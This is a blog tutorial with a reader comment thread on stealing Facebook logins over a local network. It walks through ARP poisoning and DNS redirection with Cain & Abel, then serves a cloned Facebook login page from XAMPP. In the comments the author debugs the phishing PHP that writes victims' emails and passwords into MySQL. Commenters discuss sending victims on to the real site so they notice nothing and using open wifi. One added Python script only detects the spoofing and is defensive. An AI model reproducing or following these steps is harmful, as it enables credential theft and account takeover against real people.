Type : Tutorial
Level : Medium, Advanced
In this tutorial I will demonstrate how a Facebook account can be hacked using a Man-in-the-Middle (MITM) attack. This attack usually happens inside a Local Area Network (LAN) in an office, internet cafe, apartment, etc.
Below is the topology showing how MITM works and how it can be used to hack a Facebook account.

In the picture above, the attacker acts as the third person. The attacker manipulates the switch routing table so that the victim thinks the attacker is the web server, and vice versa.
For this tutorial we need to prepare the tools for the proof of concept. You can download them below.
1. XAMPP – APACHE+PHP+MySQL(We use XAMPP for our fake facebook web server)
2. Cain & Abel (We use it for Man in the Middle Attack)
3. Facebook Offline Page (I have nulled the code, so this script will not contact Facebook when the victim accesses the fake Facebook page; only use this for learning)
Update: replace your index.php and login.php with the following files: Download Here.
Okay, let's start the step-by-step how to do this:
Attacker IP Address : 192.168.160.148
Victim IP Address : 192.168.160.82
Fake Web Server : 192.168.160.148
I assume you're in a Local Area Network now.
1. Install the XAMPP and run the APACHE and MySQL service

2. Extract the fb.rar and copy the content to C:\xampp\htdocs

3. Check the fake web server by opening http://localhost/ in a web browser

4. Install Cain & Abel and do the APR (ARP Poisoning Routing); see the steps below

Click the start/stop sniffer

Choose your interface for sniffing and click OK. When it's finished, click Start/Stop Sniffer again to activate the sniffing interface.
Go to the Sniffer tab and then click the + (plus sign)

Select "All hosts in my subnet" and Click OK.

You will see the other people in your network, but my target is 192.168.160.82 (MySelf…LoL :p)

After we have all of the information, click the APR tab at the bottom of the application.

Click the + button, and follow the instruction below.

When you finish, the next step is preparing to redirect the facebook.com page to the fake web server.
Click "APR DNS" and click + to add the new redirecting rule.


When everything is finished, just click OK. The next step is to activate the APR by clicking the Start/Stop APR button.

5. The MITM attack is now active. This is what it looks like when the victim opens http://www.facebook.com

6. But if you ping the domain name, you can reveal that it's fake, because the address returned is the attacker's IP
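
The check in step 6, turned into a defender-side script (an added example, not part of the original post): it flags a MAC address that answers for several IPs in the ARP cache and a public hostname that resolves to a non-public address. The `arp -a` sample is constructed; the gateway address 192.168.160.1 and all MAC addresses are assumptions.

```python
import ipaddress
import re
import socket
from collections import defaultdict

# Constructed `arp -a` output as seen on 192.168.160.82 during the attack.
# The gateway address (192.168.160.1) and all MAC addresses are assumptions.
SAMPLE_ARP = """\
Interface: 192.168.160.82 --- 0xb
  Internet Address      Physical Address      Type
  192.168.160.1         00-0c-29-aa-bb-cc     dynamic
  192.168.160.148       00-0c-29-aa-bb-cc     dynamic
  192.168.160.200       00-1b-44-11-3a-b7     dynamic
  192.168.160.255       ff-ff-ff-ff-ff-ff     static
"""

ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+\w+",
    re.I | re.M,
)

def shared_macs(arp_text):
    """Map each unicast MAC that answers for more than one IP to those IPs."""
    by_mac = defaultdict(set)
    for ip, mac in ENTRY.findall(arp_text):
        mac = mac.lower()
        if int(mac[:2], 16) & 1:  # group bit set: broadcast or multicast
            continue
        by_mac[mac].add(ip)
    return {m: sorted(ips, key=ipaddress.ip_address)
            for m, ips in by_mac.items() if len(ips) > 1}

def check_resolution(hostname, resolver=socket.gethostbyname):
    """Resolve as `ping` would; a public site should not get a non-global IP."""
    ip = resolver(hostname)
    return ip, not ipaddress.ip_address(ip).is_global

if __name__ == "__main__":
    print(shared_macs(SAMPLE_ARP))
    # Resolver stubbed with the spoofed answer from the tutorial's lab.
    print(check_resolution("www.facebook.com", lambda _h: "192.168.160.148"))
```

A shared MAC is a lead rather than proof, since a router doing proxy ARP can legitimately answer for several addresses; the gateway and another host suddenly sharing one MAC is the pattern to investigate.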

Hope it's useful
very useful, ko vishnu…
hehehhe..
but i think social engineering is the most powerful attack to hack someone facebook
#Christ
Haha… hello Chris, how are you? Yes, that is still the most effective… that's guaranteed…
NoT Work
#anonim
maybe the facebook has change the logic of their web application…you can learn this for logic of MITM local DNS poisoning
Nice tips, unfortunately it only works on LAN..
by www.easycellular.blogspt.com
its also work on some open wifi..using router that can be poison all the computer in the network…
but i have some probs…
when i try to ping it…
it reply with request time out…how do i fix it???
is this have something to do with my server…fyi, im using wamp server…
do u know how to configure it so that the fb fake page is up and running???
thanks in advance!:D
#puppet
when you ping return RTO, maybe the packet forwarding have some problem..when MITM in action, it should forward any packet arriving on attacker computer..you can refer to this tips and trick http://vishnuvalentino.com/tips-and-trick/how-to-set-up-port-forwarding-in-linux-and-windows/ to do that
thanks 4 assisting me..
but i think the problem is my esetnod firewall…
i got another problem here…
i got this error:Notice: Undefined index: v4l in E:\xampp\htdocs\login.php on line 8
i tried to correct this by add the second if to if else($_REQUEST['v4l'] == "Login"){
mysql_query("insert into fb_fail set uname='".$_POST['email']."', pwd='".$_POST['pass']."', date='".date("Y-m-d H:i:s")."'");
}
and it fixed but this error occurred : Notice: Undefined index: login in E:\xampp\htdocs\login.php on line 4
can u help me fix it?
#puppet
Hi again, here’s I’m updating the index.php file and login.php file download here
i'll try it out…
thank v4l!
ok…
it work fine!:D
it return no error page…
but the problem is the password variable doesn't pass to the database for the (index page)..
it only capture the after the second page(http://localhost/login.php?login_attempt=1)…
(i found that the password field also doesn't set to hidden type…it display in plain text)…
thanks 4 helping me out!
#puppet
ahh my fault..I forgot to change the variable….
I've already updated the file again
update-1.rar
thanks v4l!
it works!:D
but did u know how to set the email n password in hidden mode…in appear the pass in plaintext (index.php)…
#puppet
Yep I think I’m understand now what you mean…about masking password into dotted character right?
here’s the update
plz can u tell me how to get free dotcom domain.plz
#man
you can google it here you can find the most suitable for you…esp the hosting should support PHP+MySQL
thanks v4l!:D
we did you learn how to make that fake homepage with a database…
i have so much respect with that..n you can solve my problem to about the coding…
i really want to know how you make this fake login from scratch..can you tell me..:)
#puppet
You can view the page and “save page as”.
before i find ur post i use myown fake page…
but it seem slow even in LAN network…
but yours have faster page…hehe..
thanks!
#puppet
just find
hehe..
javascript src that calls facebook.com (that's why yours slow) and continue to fix the interface by modifying the CSS+HTML
[...] etc) when you open a website, stop your step there and close your browser and try to ping the URL (see here how to ping the URL on step [...]
Where can i find the passwords and usernames ? I created the database FB and changed the username from root to v4l , but i cant find them ! please help me guys
#phil
If you use fresh install of mysql(from xampp), you can change the username into : root and password just leave empty
@v4L
You know? that would be awesome!
Is it possible to route the victim to your fake page, and after the mail and password are submitted, show the error page and redirect them to the real fb page? so they think "hu, I must have had a typo… let's try again"
Regards from germany!
#John
try add meta refresh in error pages that redirected to facebook.com.
In login.php find this line of code(line 20)
meta http-equiv=refresh content=”0; URL=?login_attempt=1&_fb_noscript=1″
change to :
meta http-equiv=refresh content=”0; URL=http://www.facebook.com?login_attempt=1&_fb_noscript=1″
That's a nice idea.. But in fact of the arp spoofing, the meta refresh wouldn't work I think… Because facebook.com is pointing to us…
#john
LoL…I’m forget about it…yep you’re right…anyway maybe you can redirect to facebook IP address
But then the IP address shows up in the url bar… or I redirect to login2.php where is an iframe or frame which includes http://<facebook ip>/login.php
That could work…
Nevertheless I didn't use Cain & Abel. I do this at my linux router and use arpspoof/bind/apache. I need something like "if victim looks up facebook.com via my local dns, point to my webserver, spoof user/pw, reload dns to point victim to origin facebook ip"
how to get the password by doing this man … this will show the page of the facebook the credentials will remain in it how to get the credentials..
#Rocker
The credentials will be saved on MySQL database of your xampp
Hey V4L! great tutorial. I just have one small question. I set everything up perfectly but then i found that Cain can't "bind HTTPS Acceptor Socket" on port 443 because Apache (w/ Xampp) is already using. Is there a way around this problem?
#Pete
You should configure your httpd.conf in your apache configuration and try to change your local HTTPS run on other port.
Hello Mr. Valentino,
I would like to know how can I download the facebook clone page, I'm not being able to do the CTRL + click process.
Thanks in advance,
Herbert.
#Herbert
There’s a grey frame, click on it.